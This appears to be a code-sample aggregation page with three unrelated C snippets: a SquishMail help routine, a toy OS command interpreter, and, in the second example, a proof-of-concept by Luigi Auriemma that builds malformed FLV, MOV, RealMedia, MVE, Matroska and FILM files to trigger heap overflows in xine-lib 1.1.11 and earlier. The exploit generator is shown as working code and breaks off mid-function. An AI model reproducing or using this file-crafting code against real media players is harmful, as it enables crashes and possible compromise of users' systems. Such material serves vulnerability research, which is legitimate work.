Esempio n. 1
/*
 * Show the two-page command-line help and terminate.
 *
 * Page one lists the invocation forms; the user is then asked to press
 * <enter>, after which page two lists the switches.  The function does
 * not return: it ends with exit(ERL_ERROR).
 */
void usage(void)
{
  char reply[50];   /* scratch buffer for the "press enter" line; contents are ignored */

  /* Page 1: invocation forms. */
  putss("SquishMail can be started with any of the following commands:\n\n"
        "   SQUISH [IN] [OUT] [SQUASH] [LINK] [switches...]\n\n"
        "       Any or all of the above options may be specified on one command-line.\n"
        "       `IN' instructs Squish to toss (import) messages.  `OUT' instructs\n"
        "       Squish to scan (export) messages.  `SQUASH' instructs Squish to\n"
        "       pack/mash messages in the netmail area.  `LINK' instructs Squish to\n"
        "       relink reply chains.  Specifying `IN' and `OUT' together turns on\n"
        "       Squish's one-pass mode.\n\n"
        "   SQUISH RESCAN <area_tag> <node>              - Rescan area to node\n"
        "   SQUISH SEND <file> [TO] <node> [flavour]     - Attach file to node\n"
        "   SQUISH GET <file> [FROM] <node> [flavour]    - Request file from node\n"
        "   SQUISH UPDATE <file> [FROM] <node> [flavour] - Upd. request file from node\n"
        "   SQUISH POLL <node> [flavour]                 - Poll node\n\n");

  /* Pause between pages; the read is bounded by the buffer size and its result is discarded. */
  (void)fputs("Press <enter> to continue: ", stdout);
  (void)fgets(reply, sizeof reply, stdin);
  putss("\n");

  /* Page 2: switches. */
  putss("Command-line arguments supported by Squish are:\n\n"
        "   -a<areas_bbs>         - Use <areas_bbs> instead of the default AREAS.BBS\n"
        "   -c<config_file>       - Use <config_file> instead of SQUISH.CFG\n"
        "   -f<echotoss>          - Use <echotoss> to log areas (toss) or to link/scan\n"
        "   -l                    - Leave uncompressed packets in OUTBOUND.SQ\n"
        "   -n<log_file>          - Override the log file given in SQUISH.CFG\n"
        "   -o                    - When doing a `squash', process outbound area only\n"
        "   -q                    - Quiet mode.  Suppresses most informational displays\n"
        "   -s<tag>               - Override default scheduling, and run schedule <tag>\n"
        "   -t                    - Toggle secure mode\n"
        "   -u                    - Toggle TossBadMsgs mode\n"
        "   -v                    - Toggle statistics mode\n"
        "   -z                    - Only scan non-passthrough areas\n");

  exit(ERL_ERROR);
}
Esempio n. 2
int main(int argc, char *argv[]) {
    FILE    *fd;
    int     i,
            attack;
    u8      *buff,
            *fname,
            *psize,
            *p;

    setbuf(stdout, NULL);

    fputs("\n"
        "xine-lib <= 1.1.11 multiple heap overflows "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = heap overflow in demux_flv (file.FLV)\n"
            " 2 = heap overflow in demux_qt (file.MOV)\n"
            " 3 = heap overflow in demux_real (file.RM)\n"
            " 4 = heap overflow in demux_wc3movie (file.MVE)\n"
            " 5 = heap overflow in ebml.c (file.MKV)\n"
            " 6 = heap overflow in demux_film.c (file.CAK)\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    fname = argv[2];

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    p = buff;
    if(attack == 1) {
        p += putss(p, "FLV\x01");
        *p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO;
        p += putxb(p, 9,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8);  // tag_type
        psize = p; p += 3;
        p += putxb(p, 0,            32);        // pts
        p += putxb(p, 0,            24);
        p += putxb(p, FLV_DATA_TYPE_OBJECT, 8);
        p += putxb(p, 13,           16);
        p += putss(p, "filepositions");
        p += putxb(p, FLV_DATA_TYPE_ARRAY, 8);
        p += putxb(p, 0x20000000,   32);
        for(i = 0; i < 4000; i++) {
            p += putxb(p, FLV_DATA_TYPE_NUMBER, 8);
            p += putxb(p, 0x4141414141414141ULL, 64);
        }
        p += putxb(p, FLV_DATA_TYPE_ENDOBJECT, 8);  // useless
        putxb(psize, p - (psize + 3 + 4 + 3),   24);

    } else if(attack == 2) {
        p += putxb(p, 8000 - 24,    32);
        p += putxb(p, MOOV_ATOM,    32);
        p += putxb(p, 8000 - 16,    32);
        p += putxb(p, RMRA_ATOM,    32);
        p += putxb(p, 8000 - 8,     32);
        p += putxb(p, RDRF_ATOM,    32);
        p += putxb(p, 0,            32);    // i + 4
        p += putxb(p, 0,            32);    // i + 8
        p += putxb(p, 0xffffffff,   32);    // i + 12
        p += putcc(p, 'A',          8000 - 12);

    } else if(attack == 3) {
        p += putxb(p, RMF_TAG,      32);
        p += putxb(p, 8,            32);
        p += putxb(p, MDPR_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 1,            16);    // mdpr->stream_number
        p += putxb(p, 0,            32);    // mdpr->max_bit_rate
        p += putxb(p, 0,            32);    // mdpr->avg_bit_rate
        p += putxb(p, 0,            32);    // mdpr->max_packet_size
        p += putxb(p, 0,            32);    // mdpr->avg_packet_size
        p += putxb(p, 0,            32);    // mdpr->start_time
        p += putxb(p, 0,            32);    // mdpr->preroll
        p += putxb(p, 0,            32);    // mdpr->duration
        p += putxb(p, 0,            8);     // mdpr->stream_name_size
                                            // mdpr->stream_name
        p += putxb(p, 0,            8);     // 
mdpr->mime_type_size=data[33+mdpr->stream_name_size];
                                            // mdpr->mime_type
        p += putxb(p, 8,            32);    // mdpr->type_specific_len
        p += putxb(p, VIDO_TAG,     32);    // mdpr->type_specific_data
        p += putxb(p, VIDO_TAG,     32);    // mdpr->type_specific_data
        putxb(psize, (p - psize) + 4, 32);
        p += putxb(p, PROP_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 0,            32);
        p += putxb(p, 1,            32);    // avg_bitrate
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);    // this->duration
        p += putxb(p, 0,            32);
        p += putxb(p, (p - buff) + 8 + 8 + DATA_CHUNK_HEADER_SIZE, 32); 
// this->index_start
        p += putxb(p, 0,            32);    // this->data_start
        putxb(psize, (p - psize) + 4, 32);
        p += putxb(p, DATA_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 0,            16);
        p += putxb(p, 0,            32);    // 
this->current_data_chunk_packet_count
        p += putxb(p, 0,            32);    // 
this->next_data_chunk_offset
        p += putxb(p, INDX_TAG,     32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            16);
        p += putxb(p, 0x15555556,   32);    // entries
        p += putxb(p, 1,            16);    // stream_num
        p += putxb(p, 0,            32);    // next_index_chunk
        for(i = 0; i < 4000; i++) {
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
        }
        putxb(psize, (p - psize) + 4, 32);

    } else if(attack == 4) {
        p += putxb(p, FORM_TAG,     32);
        p += putxb(p, 0,            32);
        p += putxb(p, MOVE_TAG,     32);
        p += putxb(p, PC_TAG,       32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxi(p, 0x555556,     32);    // this->number_of_shots
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        p += putxb(p, 0,            32);
        for(i = 0; i < 80; i++) {
            p += putxb(p, PALT_TAG, 32);
            p += putxb(p, PALETTE_CHUNK_SIZE, 32);
            p += putcc(p, 13,     PALETTE_CHUNK_SIZE);  // -> 0x48
        }

    } else if(attack == 5) {
        p += gst_ebml_write_element_id(p, EBML_ID_EBML);
        p += gst_ebml_write_element_size(p, 8000);  // not perfect
        p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE);
        p += gst_ebml_write_element_size(p, 0xffffffff);
        p += putcc(p, 'A',          8000);

    } else if(attack == 6) {
        p += putss(p, "FILM");
        p += 4;
        p += putss(p, "1.09");
        p += putxb(p, 0,            32);
        p += putxb(p, STAB_TAG,     32);
        psize = p; p += 4;
        p += putxb(p, 44100,        32);
        p += putxb(p, 0x71c71c8,    32);    // sizeof(film_sample_t) is 
36 bytes
        for(i = 0; i < 3000; i++) {
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
            p += putxb(p, 0x41414141, 32);
        }
        putxb(psize, (p - psize) - 40,     32);
        putxb(buff + 4, (p - psize) - 8 - 16, 32);

    } else {
Esempio n. 3
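/*
 * Return the register index named by the character at command[pos], or -1
 * when pos lies outside the typed text (size characters) or letti() rejects
 * the character.  The bounds check keeps operand lookups from reading bytes
 * past the end of what the user actually typed.
 */
static int reg_operand(int size, int pos)
{
	if(pos < 0 || pos >= size)
		return -1;
	return letti(command[pos]);
}

/*
 * Convert one colour digit as listed by "cc help" ('0'-'9', 'A'-'F') to its
 * value 0..15.  Returns -1 for any other character.
 */
static int color_digit(char c)
{
	if(c >= '0' && c <= '9')
		return c - '0';
	if(c >= 'A' && c <= 'F')
		return c - 55;	/* 'A' is 65, so 'A' - 55 == 10 */
	return -1;
}

/*
 * Interpret the text held in the global `command` buffer and execute it.
 *
 * Sets is_cmd to 1 for the duration of the call, dispatches on the command
 * prefix, then calls clear_command() and resets is_cmd to 0.  Longer
 * prefixes are tested before their shorter relatives ("println" before
 * "printvln" before "printv" before "print") so the right branch wins.
 *
 * The command text is user input, so every operand position is checked
 * against the typed length before it is read, colour digits are validated,
 * and division/modulo by a zero register is refused instead of faulting.
 */
void run_command() {
	is_cmd = 1;
	int size = str_len(command);
	if(str_startswith(command, "hlt") == 1) {
		text_color(BLACK, BLACK);
		clear_screen();
		halt();
	} else if(str_startswith(command, "println")) {
		putslns(command, 8, size);
	} else if(str_startswith(command, "printvln")) {
		int r = reg_operand(size, 9);
		if(r != -1)
			putnumln(reg[r]);
	} else if(str_startswith(command, "printv")) {
		int r = reg_operand(size, 7);
		if(r != -1)
			putnum(reg[r]);
	} else if(str_startswith(command, "print")) {
		putss(command, 6, size);
	} else if (str_startswith(command, "clear")) {
		clear_screen();
		index = 0;
	} else if(str_startswith(command, "setv")) {
		int r = reg_operand(size, 5);
		if(r != -1) {
			/*
			 * Blank out "setv x " so atoi() sees only the value.  Stop at
			 * the end of the typed text: blanking a fixed 7 bytes on a
			 * shorter command would overwrite the terminator and let
			 * atoi() run past the string.
			 */
			int limit = size < 7 ? size : 7;
			int i = 0;
			while(i < limit) {
				command[i] = ' ';
				i++;
			}

			reg[r] = atoi(command);
		}
	} else if(str_startswith(command, "add")) {
		int dst = reg_operand(size, 4);
		int src = reg_operand(size, 6);
		if(dst != -1 && src != -1)
			reg[dst] += reg[src];
	} else if(str_startswith(command, "sub")) {
		int dst = reg_operand(size, 4);
		int src = reg_operand(size, 6);
		if(dst != -1 && src != -1)
			reg[dst] -= reg[src];
	} else if(str_startswith(command, "mul")) {
		int dst = reg_operand(size, 4);
		int src = reg_operand(size, 6);
		if(dst != -1 && src != -1)
			reg[dst] *= reg[src];
	} else if(str_startswith(command, "div")) {
		int dst = reg_operand(size, 4);
		int src = reg_operand(size, 6);
		if(dst != -1 && src != -1) {
			/* A zero divisor is undefined behaviour in C; refuse it. */
			/* NOTE(review): the most-negative value divided by -1 also overflows — confirm reg's type and guard if signed. */
			if(reg[src] != 0)
				reg[dst] /= reg[src];
			else
				putsln(">>> Division by zero.");
		}
	} else if(str_startswith(command, "mod")) {
		int dst = reg_operand(size, 4);
		int src = reg_operand(size, 6);
		if(dst != -1 && src != -1) {
			/* Same zero-divisor guard as "div". */
			if(reg[src] != 0)
				reg[dst] %= reg[src];
			else
				putsln(">>> Division by zero.");
		}
	} else if(str_startswith(command, "cc") == 1) {
		if(str_startswith(command, "cc help")) {
			putsln("Colors:");
			putsln(">>> BLACK       :: 0");
			putsln(">>> BLUE        :: 1");
			putsln(">>> GREEN       :: 2");
			putsln(">>> CYAN        :: 3");
			putsln(">>> RED         :: 4");
			putsln(">>> MAGENTA     :: 5");
			putsln(">>> BROWN       :: 6");
			putsln(">>> LT GRAY     :: 7");
			putsln(">>> DK GRAY     :: 8");
			putsln(">>> LT BLUE     :: 9");
			putsln(">>> LT GREEN    :: A");
			putsln(">>> LT CYAN     :: B");
			putsln(">>> LT RED      :: C");
			putsln(">>> LT MAGENTA  :: D");
			putsln(">>> LT BROWN    :: E");
			putsln(">>> WHITE       :: F");
		} else {
			/*
			 * "cc fb": foreground digit at index 3, background at index 4.
			 * Both must lie inside the typed text and be valid colour
			 * digits; previously two letter digits converted the
			 * foreground with the numeric offset, and arbitrary characters
			 * were passed straight to text_color().
			 */
			int f = size > 3 ? color_digit(command[3]) : -1;
			int b = size > 4 ? color_digit(command[4]) : -1;
			if(f != -1 && b != -1)
				text_color(f, b);
			else
				putsln(">>> Invalid color. Try cc help.");
		}
	} else if(str_startswith(command, "help") == 1) {
		putsln("Commands:");
		putsln(">>> hlt          :: halts cpu");
		putsln(">>> cc fb|help   :: change text color - (fore, back)");
		putsln(">>> print text   :: print out a piece of text");
		putsln(">>> printv let   :: print out the value of variable let");
		putsln(">>> printvln let :: print out the value of variable let with a line after");
		putsln(">>> println text :: print out a piece of text with a line");
		putsln(">>> clear        :: Clears the screen");
		putsln(">>> setv let val :: set variable let to val");
		putsln(">>> add base set :: adds base to set and stores in base");
		/* The three entries below were corrected to match the code: the result always lands in base. */
		putsln(">>> sub base set :: subtracts set from base and stores in base");
		putsln(">>> mul base set :: multiplies base by set and stores in base");
		putsln(">>> div base set :: divides base by set and stores in base");
		putsln(">>> mod base set :: divides base by set and stores remainder in base");
		putsln(">>> println text :: print out a piece of text with a line");
		putsln(">>> help         :: show help command");
	} else {
		puts(">>> Unknown command: ");
		putsln(command);
		putsln(">>> Try help.");
	}
	clear_command();

	is_cmd = 0;
}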